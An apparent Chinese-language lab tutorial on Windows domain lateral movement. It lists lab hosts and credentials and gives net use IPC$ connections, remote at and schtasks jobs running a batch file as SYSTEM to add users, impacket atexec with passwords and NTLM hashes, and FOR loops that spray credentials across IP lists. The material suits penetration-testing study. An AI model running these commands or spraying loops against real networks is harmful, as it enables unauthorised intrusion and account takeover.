内网机器结构

机器账号密码如下:

2008 r2 webserver   域内 web 服务器   本地管理员账号密码 : .\administraotr:admin!@#45   当前机器域用户密码 : god\webadmin:admin!@#45

2003 x86 fileserver   域内文件服务器    本地管理员账号密码 : administrator : admin         当前机器域用户密码 : god\fileadmin : Admin12345

2008 r2 x64 dc god.org 主域控机器       域管账号密码: God\administrator : Admin12345

2012 sqlserver 域内数据库服务器      本地管理员账号密码 : .\administrator:admin!@#45    当前机器域用户密码 : god\dbadmin:admin!@#45

w7 x64 mary-pc 域内个人机         本地管理员账号密码 : .\mary : admin            当前机器域用户密码 : god\mary : admin!@#45

w8.1 x64 jack-pc 域内个人机          本地管理员账号密码 : .\jack : admin           当前机器域用户密码 : god\boss : Admin12345

(1)横向渗透明文传递at&schtasks

在拿下了一台内网主机之后,通过本地信息收集用户凭证等信息之后,为了拿下更多的主机,可以使用at&schtasks命令,在已知目标系统的明文用户明文密码的基础上,直接可以在远程主机上执行命令

比方说:1.获取到了某域内主机的权限

    2.通过minikatz得到了明文密码

    3.用信息收集到域中的用户列表作为用户名字典

    4.用得到的明文密码作为密码字典

    5.尝试连接

    6.创建计划任务(at|schtasks)

    7.执行文件可以是后门代码或者相关命令

  • 利用流程:

    1.建立IPC连接到目标主机

    2.拷贝要执行的命令脚本到目标主机

    3.查看目标时间,创建计划任务(at、schtasks)定时执行拷贝到的脚本

    4.删除IPC连接

  • 命令:

    net use \\server\ipc$"password" /user:username   # 工作组

    net use \\server\ipc$"password" /user:domain\username   #域内

    dir \\xx.xx.xx.xx\C$\   # 查看文件列表

    copy \\xx.xx.xx.xx\C$\1.bat 1.bat   # 下载文件

    copy 1.bat \\xx.xx.xx.xx\C$   # 复制文件

    net use \\xx.xx.xx.xx\C$\1.bat /del   # 删除

    IPC net view xx.xx.xx.xx   # 查看对方共享

  • 建立 IPC 常见的错误代码

(1)5:拒绝访问,可能是使用的用户不是管理员权限,需要先提升权限

(2)51:网络问题,Windows 无法找到网络路径

(3)53:找不到网络路径,可能是 IP 地址错误、目标未开机、目标 Lanmanserver 服务未启动、有 防火墙等问题

(4)67:找不到网络名,本地 Lanmanworkstation 服务未启动,目标删除 ipc$

(5)1219:提供的凭据和已存在的凭据集冲突,说明已建立 IPC$,需要先删除

(6)1326:账号密码错误

(7)1792:目标 NetLogon 服务未启动,连接域控常常会出现此情况

(8)2242:用户密码过期,目标有账号策略,强制定期更改密码

  • 建立 IPC 失败的原因

(1)目标系统不是 NT 或以上的操作系统

(2)对方没有打开 IPC$共享

(3)对方未开启 139、445 端口,或者被防火墙屏蔽

(4)输出命令、账号密码有错误

  • [at] & [schtasks]的操作过程

at要在Windows2012以下版本使用

1 net use \\192.168.3.21\ipc$ "Admin12345" /user:god.org\ad
2 ministrator # 建立 ipc 连接
3 copy add.bat \\192.168.3.21\c$ #拷贝执行文件到目标机器
4 at \\192.168.3.21 15:47 c:\add.bat #添加计划任务

schtasks要在Windows2012及以上版本使用

1 net use \\192.168.3.32\ipc$ "admin!@#45" /user:god.org\ad
2 ministrator # 建立 ipc 连接:
3 copy add.bat \\192.168.3.32\c$ #复制文件到其 C 盘
4 schtasks /create /s 192.168.3.32 /ru "SYSTEM" /tn adduser /sc DAILY /tr c:\add.bat /F #创建 adduser 任务 对应执行文件
5 schtasks /run /s 192.168.3.32 /tn adduser /i #运行 adduser 任务
6 schtasks /delete /s 192.168.3.21 /tn adduser /f#删除 adduser 任务

at命令实际操作:

使用net use命令连接域控主机,假设已经知道域控的账号密码

然后将以下脚本写入add.bat

将脚本写入域控的C盘中

可以看到文件成功写入了

创建定时任务,执行add操作

可以看到leslie用户成功的被添加上去了

schtasks命令实际操作:

域用户无法操作,因此需要去连接本地administrator

连接

然后就使用即可

4 schtasks /create /s 192.168.3.32 /ru "SYSTEM" /tn adduser /sc DAILY /tr c:\add.bat /F #创建 adduser 任务 对应执行文件
5 schtasks /run /s 192.168.3.32 /tn adduser /i #运行 adduser 任务
6 schtasks /delete /s 192.168.3.21 /tn adduser /f#删除 adduser 任务
  • atexec-impacket的使用

atexec.exe ./administrator:Admin12345@192.168.3.21 "whoami"

atexec.exe god/administrator:Admin12345@192.168.3.21 "whoami"

atexec.exe -hashes :ccef208c6485269c20db2cad21734fe7 ./administrator@192.168.3.21 "whoami"

#案例 3-横向渗透明文 HASH 传递批量利用-综合

FOR /F %%i in (ips.txt) do net use \\%%i\ipc$ "admin!@#45" /user:administrator #批量检测 IP 对应明文 连接

FOR /F %%i in (ips.txt) do atexec.exe ./administrator:admin!@#45@%%i whoami #批量检测 IP 对应明文 回显版

FOR /F %%i in (pass.txt) do atexec.exe ./administrator:%%i@192.168.3.21 whoami #批量检测明文对应 IP 回显版

FOR /F %%i in (hash.txt) do atexec.exe -hashes :%%i ./administrator@192.168.3.21 whoami #批量检测 HASH 对应 IP 回显版

内网渗透-at&schtasks&impacket的使用的更多相关文章

  1. 内网渗透-横向移动($IPC&at&schtasks)

    内网渗透-横向移动 #建立ipc连接并将后门添加至计划任务 前置条件:获取到某域主机权限->得到明文或者hash,通过信息收集到的用户列表当做用户名字典->用得到的密码明文当做密码字典 本 ...

  2. 【CTF】msf和impacket联合拿域控内网渗透-拿域控

    前言 掌控安全里面的靶场内网渗透,练练手! 内网渗透拿域控 环境:http://afsgr16-b1ferw.aqlab.cn/?id=1 1.进去一看,典型的sql注入 2.测试了一下,可以爆库,也 ...

  3. 内网渗透之IPC,远程执行

    开启服务 net start Schedule net start wmiApSrv 关闭防火墙 net stop sharedaccess net use \\目标IP\ipc$ "&qu ...

  4. 5.内网渗透之PTH&PTT&PTK

    ---------------------------------------------- 本文参考自三好学生-域渗透系列文章 内网渗透之PTH&PTT&PTK PTH(pass-t ...

  5. 内网渗透 - 提权 - Windows

    MS提权 MS16- MS16- 提权框架 Sherlock 信息收集 ifconfig -a cat /etc/hosts arp -a route -n cat /proc/net/* ping扫 ...

  6. 内网渗透之vlunstack靶场

    前言:vlunstack靶场是由三台虚拟机构成,一台是有外网ip的windows7系统(nat模式),另外两台是纯内网机器(外网ping不通),分别是域控win2008和内网主机win2003,这里就 ...

  7. 内网渗透测试思路-FREEBUF

    (在拿到webshell的时候,想办法获取系统信息拿到系统权限) 一.通过常规web渗透,已经拿到webshell.那么接下来作重要的就是探测系统信息,提权,针对windows想办法开启远程桌面连接, ...

  8. 内网渗透 关于GPO

    网上有很多讲内网渗透的文章,但看来看去还是一老外的博客给力,博客地址:www.harmj0y.net/blog,看完就明白这里面的很多思路都非常好. 做内网时,有时会碰到目标的机器开防火墙,所有端口基 ...

  9. [原创]K8 Cscan 3.6大型内网渗透自定义扫描器

    前言:无论内网还是外网渗透信息收集都是非常关键,信息收集越多越准确渗透的成功率就越高但成功率还受到漏洞影响,漏洞受时效性影响,对于大型内网扫描速度直接影响着成功率漏洞时效性1-2天,扫描内网或外网需1 ...

  10. [原创]K8 cping 3.0大型内网渗透扫描工具

    [原创]K8 Cscan 大型内网渗透自定义扫描器 https://www.cnblogs.com/k8gege/p/10519321.html Cscan简介:何为自定义扫描器?其实也是插件化,但C ...

随机推荐

  1. 前端ajax发送post 请求 json格式 springMVC报错415

    如标题所示 后端填坑日记 在使用springMVC的时候发现 后端使用@RequestBody注解会报错415 不支持的媒体类型 相信很多小伙伴都遇到过或者正在面临这个报错 提示错误:The serv ...

  2. Shading-JDBC、ShadingSphere、ShardingProxy 使用详解

    ShadingSphere ​ShardingSphere是一款起源于当当网内部的应用框架,2015年在当当网内部诞生,2016年由主要开发人员张亮带入京东数科,在国内经历了当当网.电信翼支付.京东数 ...

  3. 在vue页面引入echarts,图表的数据来自数据库 springboot+mybatis+vue+elementui+echarts实现图表的制作

    文章目录 1.实现的效果 2.前端代码 3.后端controller代码 4.servie层代码 5.serviceImpl层代码 6.mapper层代码 7.xml中的sql语句 8.遇到的问题 8 ...

  4. 2.Python封装练习及私有属性

    面向对象三大特性 封装:根据职责将属性和方法封装到一个抽象的类中 继承:实现代码的重用,相同代码不需要重复的编写 1.单继承 2.多继承 多态:不同的对象调用相同的方法,产生不同的执行结果,增加代码的 ...

  5. 驱动开发:内核封装WSK网络通信接口

    本章LyShark将带大家学习如何在内核中使用标准的Socket套接字通信接口,我们都知道Windows应用层下可直接调用WinSocket来实现网络通信,但在内核模式下应用层API接口无法使用,内核 ...

  6. or、and表达式

    or 逻辑表达式 result = a or b 如果a为空则执行or后面的b,如果a不为空,则执行or前面的a 即:赋值运算中,如果or前面为真,就不会去执行or后面的,如果or前面为假才会执行or ...

  7. 关于Redis的,你了解多少?来看看我的笔记

    Redis 概述 Redis(Remote Dictionary Server ),即远程字典服务,是一个开源的使用ANSI C语言编写.支持网络.可基于内存亦可持久化的日志型.Key-Value数据 ...

  8. SpringCloudAlibaba 微服务组件 Nacos 之配置中心源码深度解析

    大家好,这篇文章跟大家聊下 SpringCloudAlibaba 中的微服务组件 Nacos.Nacos 既能做注册中心,又能做配置中心,这篇文章主要来聊下做配置中心时 client 端的一些设计,主 ...

  9. .net 温故知新:【9】.NET日志记录 ILogger使用和原理

    日志 日志作为我们程序记录的"黑匣子"是不论什么系统都会使用到的,比如我们经常使用的log4net就是第三方日志记录提供程序.NET 支持使用各种内置和第三方日志记录提供程序的日志 ...

  10. TKK: 更新 TKK 失败,请检查网络连接 idea翻译错误-IDEA翻译失败-Translation用不了

    IDEA 提示:更新 TKK 失败,请检查网络连接 解决方法: 1.进入 C:\Windows\System32\drivers\etc 找到 hosts文件修改 注意:如果用记事本打开不能修改,则修 ...